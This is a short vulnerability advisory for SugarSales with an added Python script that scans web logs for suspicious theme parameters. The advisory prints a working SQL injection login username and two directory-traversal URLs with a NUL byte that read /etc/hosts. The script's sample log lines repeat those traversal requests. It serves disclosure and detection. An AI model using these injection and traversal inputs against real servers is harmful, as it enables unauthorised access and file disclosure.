
SugarSales Multiple Remote Vulnerabilities

Example URIs sufficient to exploit these vulnerabilities have been provided:

To log into SugarSales, utilize the username "admin' or 1=1 -- " with any password.

To disclose the contents of potentially sensitive files:
http://www.example.com/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00
http://www.example.com/sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00
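
For defenders reviewing web server logs, the following added example (not part of the original advisory or of SugarSales) flags requests whose theme parameter carries a NUL byte or directory traversal, as in the two URIs above. It assumes Apache combined-style access logs and that legitimate theme names are plain identifiers; the log lines and the theme name "Default" are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: legitimate theme names are short plain identifiers.
SAFE_THEME = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (Apache combined-style); "Default" is a made-up theme.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /sugarcrm/modules/Users/Login.php?theme=Default HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2009:10:00:05 +0000] "GET /sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00 HTTP/1.1" 200 731',
    '192.0.2.44 - - [01/Jan/2009:10:00:06 +0000] "GET /sugarcrm/modules/Calls/index.php?theme=/../../../etc/hosts%00 HTTP/1.1" 200 731',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def theme_findings(log_line):
    """Return the reasons the theme parameter of a logged request is suspect."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name != "theme":
            continue
        value = fully_decode(raw)  # parse_qsl has already decoded once
        if "\x00" in value:
            findings.append("nul-byte")
        if ".." in re.split(r"[\\/]", value):
            findings.append("path-traversal")
        if not SAFE_THEME.fullmatch(value):
            findings.append("not-a-theme-name")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(theme_findings(line) or "ok", "<-", line.split('"')[1])
```

The same allowlist pattern can serve as server-side input validation for the theme value before it is used to build a file path.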







 

Copyright 2009, SecurityFocus